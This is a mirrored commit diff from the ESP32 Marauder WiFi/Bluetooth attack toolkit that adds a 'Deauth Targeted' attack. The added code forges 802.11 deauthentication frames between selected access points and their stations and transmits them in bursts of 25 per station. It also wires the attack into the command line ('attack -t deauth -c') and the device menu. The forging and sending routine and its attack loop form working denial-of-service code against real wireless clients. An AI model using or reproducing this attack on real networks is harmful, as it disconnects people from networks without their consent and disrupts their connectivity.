gitea-mirror/ESP32Marauder
1
0
Fork 0
mirror of https://github.com/justcallmekoko/ESP32Marauder.git synced 2025-12-12 07:40:58 -08:00
Code Issues Packages Projects Releases Wiki Activity

Add command to attack stations

Browse Source
This commit is contained in:
Just Call Me Koko
2022-12-22 15:21:54 -05:00
parent e54e291bfd
commit 7d64840128
7 changed files with 140 additions and 43 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@@ -3,7 +3,7 @@
<!---[![Build Status](https://travis-ci.com/justcallmekoko/ESP32Marauder.svg?branch=master)](https://travis-ci.com/justcallmekoko/ESP32Marauder)--->
<!---Shields/Badges https://shields.io/--->
# ESP32 Marauder v0.9.20
# ESP32 Marauder v0.10.0
<p align="center"><img alt="Marauder logo" src="https://github.com/justcallmekoko/ESP32Marauder/blob/master/pictures/marauder3L.jpg?raw=true" width="300"></p>
<p align="center">
<b>A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32</b>

23
esp32_marauder/CommandLine.cpp
View File

@@ -109,11 +109,8 @@ void CommandLine::runCommand(String input) {
Serial.println(HELP_CH_CMD);
Serial.println(HELP_SETTINGS_CMD);
Serial.println(HELP_CLEARAP_CMD_A);
Serial.println(HELP_CLEARAP_CMD_B);
Serial.println(HELP_CLEARAP_CMD_C);
Serial.println(HELP_REBOOT_CMD);
Serial.println(HELP_UPDATE_CMD_A);
Serial.println(HELP_UPDATE_CMD_B);
// WiFi sniff/scan
Serial.println(HELP_SCANAP_CMD);
@@ -361,6 +358,7 @@ void CommandLine::runCommand(String input) {
int ap_beacon_sw = this->argSearch(&cmd_args, "-a");
int src_addr_sw = this->argSearch(&cmd_args, "-s");
int dst_addr_sw = this->argSearch(&cmd_args, "-d");
int targ_sw = this->argSearch(&cmd_args, "-c");
if (attack_type_switch == -1) {
Serial.println("You must specify an attack type");
@@ -372,14 +370,21 @@ void CommandLine::runCommand(String input) {
// Branch on attack type
// Deauth
if (attack_type == ATTACK_TYPE_DEAUTH) {
if (dst_addr_sw == -1) {
// Default to broadcast
if ((dst_addr_sw == -1) && (targ_sw == -1)) {
Serial.println("Sending to broadcast...");
wifi_scan_obj.dst_mac = "ff:ff:ff:ff:ff:ff";
}
else {
// Dest addr specified
else if (dst_addr_sw != -1) {
wifi_scan_obj.dst_mac = cmd_args.get(dst_addr_sw + 1);
Serial.println("Sending to " + wifi_scan_obj.dst_mac + "...");
}
// Station list specified
else if (targ_sw != -1)
Serial.println("Sending to Station list");
// Source addr not specified
if (src_addr_sw == -1) {
if (!this->apSelected()) {
Serial.println("You don't have any targets selected. Use " + (String)SEL_CMD);
@@ -390,8 +395,14 @@ void CommandLine::runCommand(String input) {
menu_function_obj.drawStatusBar();
#endif
Serial.println("Starting Deauthentication attack. Stop with " + (String)STOPSCAN_CMD);
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED);
// Station list not specified
if (targ_sw == -1)
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED);
// Station list specified
else
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH_TARGETED, TFT_ORANGE);
}
// Source addr specified
else {
String src_mac_str = cmd_args.get(src_addr_sw + 1);
sscanf(src_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx",

9
esp32_marauder/CommandLine.h
View File

@@ -70,12 +70,9 @@ const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
// Admin
const char PROGMEM HELP_HEAD[] = "============ Commands ============";
const char PROGMEM HELP_CH_CMD[] = "channel [-s <channel>]";
const char PROGMEM HELP_CLEARAP_CMD_A[] = "clearlist -a";
const char PROGMEM HELP_CLEARAP_CMD_B[] = "clearlist -s";
const char PROGMEM HELP_CLEARAP_CMD_C[] = "clearlist -c";
const char PROGMEM HELP_CLEARAP_CMD_A[] = "clearlist -a/-c/-s";
const char PROGMEM HELP_REBOOT_CMD[] = "reboot";
const char PROGMEM HELP_UPDATE_CMD_A[] = "update -s";
const char PROGMEM HELP_UPDATE_CMD_B[] = "update -w";
const char PROGMEM HELP_UPDATE_CMD_A[] = "update -s/-w";
const char PROGMEM HELP_SETTINGS_CMD[] = "settings [-s <setting> enable/disable>]/[-r]";
// WiFi sniff/scan
@@ -91,7 +88,7 @@ const char PROGMEM HELP_SNIFF_PMKID_CMD[] = "sniffpmkid [-c <channel>]";
const char PROGMEM HELP_STOPSCAN_CMD[] = "stopscan";
// WiFi attack
const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-s <src mac>] [-d <dst mac>]/probe/rickroll>";
const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-c]/[-s <src mac>] [-d <dst mac>]/probe/rickroll>";
// WiFi Aux
const char PROGMEM HELP_LIST_AP_CMD_A[] = "list -s";

19
esp32_marauder/MenuFunctions.cpp
View File

@@ -889,6 +889,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_TARGETED) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_MIMIC) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_RICK_ROLL))
display_obj.displayBuffer();
@@ -898,7 +899,6 @@ void MenuFunctions::main(uint32_t currentTime)
int pre_getTouch = millis();
// getTouch causes a 10ms delay which makes beacon spam less effective
//if (wifi_scan_obj.currentScanMode == WIFI_SCAN_OFF)
#ifndef MARAUDER_MINI
pressed = display_obj.tft.getTouch(&t_x, &t_y);
#endif
@@ -928,13 +928,13 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_MIMIC) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
{
//Serial.println("Stopping scan...");
wifi_scan_obj.StartScan(WIFI_SCAN_OFF);
// If we don't do this, the text and button coordinates will be off
@@ -977,6 +977,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_MIMIC) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
@@ -986,7 +987,6 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_SCAN_ACTIVE_EAPOL) ||
(wifi_scan_obj.currentScanMode == WIFI_PACKET_MONITOR))
{
//Serial.println("Stopping scan...");
wifi_scan_obj.StartScan(WIFI_SCAN_OFF);
// If we don't do this, the text and button coordinates will be off
@@ -1013,9 +1013,9 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_TARGETED) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_MIMIC) &&
(wifi_scan_obj.currentScanMode != WIFI_ATTACK_RICK_ROLL))
//(wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_LIST))
{
// Need this to set all keys to false
for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++) {
@@ -1030,8 +1030,6 @@ void MenuFunctions::main(uint32_t currentTime)
for (uint8_t b = 0; b < current_menu->list->size(); b++) {
display_obj.tft.setFreeFont(MENU_FONT);
if (display_obj.key[b].justPressed()) {
//display_obj.key[b].drawButton2(current_menu->list->get(b).name, true); // draw invert
//display_obj.key[b].drawButton(ML_DATUM, BUTTON_PADDING, current_menu->list->get(b).name, true);
display_obj.key[b].drawButton(true, current_menu->list->get(b).name);
if (current_menu->list->get(b).name != text09)
display_obj.tft.drawXBitmap(0,
@@ -1042,14 +1040,10 @@ void MenuFunctions::main(uint32_t currentTime)
current_menu->list->get(b).color,
TFT_BLACK);
}
//else if (pressed)
// display_obj.key[b].drawButton(false, current_menu->list->get(b).name);
// If button was just release, execute the button's function
if ((display_obj.key[b].justReleased()) && (!pressed))
{
//display_obj.key[b].drawButton2(current_menu->list->get(b).name); // draw normal
//display_obj.key[b].drawButton(ML_DATUM, BUTTON_PADDING, current_menu->list->get(b).name);
display_obj.key[b].drawButton(false, current_menu->list->get(b).name);
current_menu->list->get(b).callable();
}
@@ -1671,6 +1665,11 @@ void MenuFunctions::RunSetup()
this->drawStatusBar();
wifi_scan_obj.StartScan(WIFI_ATTACK_AP_SPAM, TFT_MAGENTA);
});
addNodes(&wifiAttackMenu, text_table1[62], TFT_RED, NULL, DEAUTH_SNIFF, [this]() {
display_obj.clearScreen();
this->drawStatusBar();
wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH_TARGETED, TFT_ORANGE);
});
//addNodes(&wifiAttackMenu, "AP Mimic Flood", TFT_PURPLE, NULL, DEAUTH_SNIFF, [this]() {
// display_obj.clearScreen();
// this->drawStatusBar();

122
esp32_marauder/WiFiScan.cpp
View File

@@ -324,6 +324,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
this->startWiFiAttacks(scan_mode, color, text_table4[8]);
else if (scan_mode == WIFI_ATTACK_DEAUTH_MANUAL)
this->startWiFiAttacks(scan_mode, color, text_table4[8]);
else if (scan_mode == WIFI_ATTACK_DEAUTH_TARGETED)
this->startWiFiAttacks(scan_mode, color, text_table4[47]);
else if (scan_mode == WIFI_ATTACK_AP_SPAM)
this->startWiFiAttacks(scan_mode, color, " AP Beacon Spam ");
else if (scan_mode == BT_SCAN_ALL) {
@@ -463,6 +465,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
(currentScanMode == WIFI_ATTACK_AUTH) ||
(currentScanMode == WIFI_ATTACK_DEAUTH) ||
(currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(currentScanMode == WIFI_ATTACK_MIMIC) ||
(currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(currentScanMode == WIFI_PACKET_MONITOR) ||
@@ -2354,24 +2357,6 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
}
}
/*
void WiFiScan::broadcastAPBeacon(uint32_t currentTime, AccessPoint custom_ssid) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Randomize SRC MAC
packet[10] = packet[16] = custom_ssid.bssid[0];
packet[11] = packet[17] = custom_ssid.bssid[1];
packet[12] = packet[18] = custom_ssid.bssid[2];
packet[13] = packet[19] = custom_ssid.bssid[3];
packet[14] = packet[20] = custom_ssid.bssid[4];
packet[15] = packet[21] = custom_ssid.bssid[5];
char ESSID[custom_ssid.essid.length() + 1] = {};
custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
}*/
void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
@@ -2638,6 +2623,70 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) {
}
}
void WiFiScan::sendDeauthFrame(int bssid[6], int channel, uint8_t mac[6]) {
WiFiScan::set_channel = channel;
esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Build AP source packet
deauth_frame_default[4] = mac[0];
deauth_frame_default[5] = mac[1];
deauth_frame_default[6] = mac[2];
deauth_frame_default[7] = mac[3];
deauth_frame_default[8] = mac[4];
deauth_frame_default[9] = mac[5];
deauth_frame_default[10] = bssid[0];
deauth_frame_default[11] = bssid[1];
deauth_frame_default[12] = bssid[2];
deauth_frame_default[13] = bssid[3];
deauth_frame_default[14] = bssid[4];
deauth_frame_default[15] = bssid[5];
deauth_frame_default[16] = bssid[0];
deauth_frame_default[17] = bssid[1];
deauth_frame_default[18] = bssid[2];
deauth_frame_default[19] = bssid[3];
deauth_frame_default[20] = bssid[4];
deauth_frame_default[21] = bssid[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
// Build AP dest packet
deauth_frame_default[4] = bssid[0];
deauth_frame_default[5] = bssid[1];
deauth_frame_default[6] = bssid[2];
deauth_frame_default[7] = bssid[3];
deauth_frame_default[8] = bssid[4];
deauth_frame_default[9] = bssid[5];
deauth_frame_default[10] = mac[0];
deauth_frame_default[11] = mac[1];
deauth_frame_default[12] = mac[2];
deauth_frame_default[13] = mac[3];
deauth_frame_default[14] = mac[4];
deauth_frame_default[15] = mac[5];
deauth_frame_default[16] = mac[0];
deauth_frame_default[17] = mac[1];
deauth_frame_default[18] = mac[2];
deauth_frame_default[19] = mac[3];
deauth_frame_default[20] = mac[4];
deauth_frame_default[21] = mac[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
}
void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str) {
// Itterate through all access points in list
// Check if active
@@ -3508,6 +3557,43 @@ void WiFiScan::main(uint32_t currentTime)
packets_sent = 0;
}
}
else if (currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) {
// Loop through each AP
for (int x = 0; x < access_points->size(); x++) {
// Only get selected APs
if (access_points->get(x).selected) {
AccessPoint cur_ap = access_points->get(x);
// Loop through each AP's Station
for (int i = 0; i < cur_ap.stations->size(); i++) {
// Only get selected Stations
if (stations->get(cur_ap.stations->get(i)).selected) {
Station cur_sta = stations->get(cur_ap.stations->get(i));
// Send deauths for each selected AP's selected Station
for (int y = 0; y < 25; y++)
this->sendDeauthFrame(cur_ap.bssid, cur_ap.channel, cur_sta.mac);
// Display packets sent on screen
if (currentTime - initTime >= 1000) {
initTime = millis();
String displayString = "";
String displayString2 = "";
displayString.concat(text18);
displayString.concat(packets_sent);
for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
displayString2.concat(" ");
#ifdef HAS_SCREEN
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.showCenterText(displayString2, 160);
display_obj.showCenterText(displayString, 160);
#endif
packets_sent = 0;
}
}
}
}
}
}
else if ((currentScanMode == WIFI_ATTACK_MIMIC)) {
// Need this for loop because getTouch causes ~10ms delay
// which makes beacon spam less effective

2
esp32_marauder/WiFiScan.h
View File

@@ -66,6 +66,7 @@
#define WIFI_ATTACK_DEAUTH_MANUAL 24
#define WIFI_SCAN_RAW_CAPTURE 25
#define WIFI_SCAN_STATION 26
#define WIFI_ATTACK_DEAUTH_TARGETED 27
#define GRAPH_REFRESH 100
@@ -246,6 +247,7 @@ class WiFiScan
void sendProbeAttack(uint32_t currentTime);
void sendDeauthAttack(uint32_t currentTime, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
void sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
void sendDeauthFrame(int bssid[6], int channel, uint8_t mac[6]);
void broadcastRandomSSID(uint32_t currentTime);
void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid);

6
esp32_marauder/lang_var.h
View File

@@ -100,6 +100,7 @@ PROGMEM const char text1_58[] = "Raw Capture";
PROGMEM const char text1_59[] = "Station Sniff";
PROGMEM const char text1_60[] = "Clear Stations";
PROGMEM const char text1_61[] = "Select Stations";
PROGMEM const char text1_62[] = "Deauth Targeted";
//SDInterface.cpp texts
@@ -175,12 +176,13 @@ PROGMEM const char text4_43[] = "Scanning for\nBluetooth-enabled skimmers\nHC-03
PROGMEM const char text4_44[] = " AP Scan ";
PROGMEM const char text4_45[] = "Clearing Stations...";
PROGMEM const char text4_46[] = "Stations Cleared: ";
PROGMEM const char text4_47[] = "Targeted Deauth";
//Making tables
PROGMEM const char *text_table0[] = {text0_0,text0_1, text0_2, text0_3, text0_4, text0_5, text0_6, text0_7, text0_8};
PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56,text1_57,text1_58,text1_59,text1_60,text1_61};
PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56,text1_57,text1_58,text1_59,text1_60,text1_61,text1_62};
PROGMEM const char *text_table2[] = {text2_0,text2_1,text2_2,text2_3,text2_4,text2_5,text2_6,text2_7,text2_8,text2_9,text2_10,text2_11,text2_12,text2_13,text2_14};
PROGMEM const char *text_table3[] = {text3_0,text3_1,text3_2,text3_3,text3_4,text3_5};
PROGMEM const char *text_table4[] = {text4_0,text4_1,text4_2,text4_3,text4_4,text4_5,text4_6,text4_7,text1_54,text4_9,text4_10,text4_11,text4_12,text4_13,text4_14,text4_15,text4_16,text4_17,text4_18,text4_19,text4_20,text4_21,text4_22,text4_23,text4_24,text4_25,text4_26,text4_27,text4_28,text4_29,text4_30,text4_31,text4_32,text4_33,text4_34,text4_35,text4_36,text4_37,text4_38,text4_39,text4_40,text4_41,text4_42,text4_43,text4_44,text4_45,text4_46};
PROGMEM const char *text_table4[] = {text4_0,text4_1,text4_2,text4_3,text4_4,text4_5,text4_6,text4_7,text1_54,text4_9,text4_10,text4_11,text4_12,text4_13,text4_14,text4_15,text4_16,text4_17,text4_18,text4_19,text4_20,text4_21,text4_22,text4_23,text4_24,text4_25,text4_26,text4_27,text4_28,text4_29,text4_30,text4_31,text4_32,text4_33,text4_34,text4_35,text4_36,text4_37,text4_38,text4_39,text4_40,text4_41,text4_42,text4_43,text4_44,text4_45,text4_46,text4_47};
#endif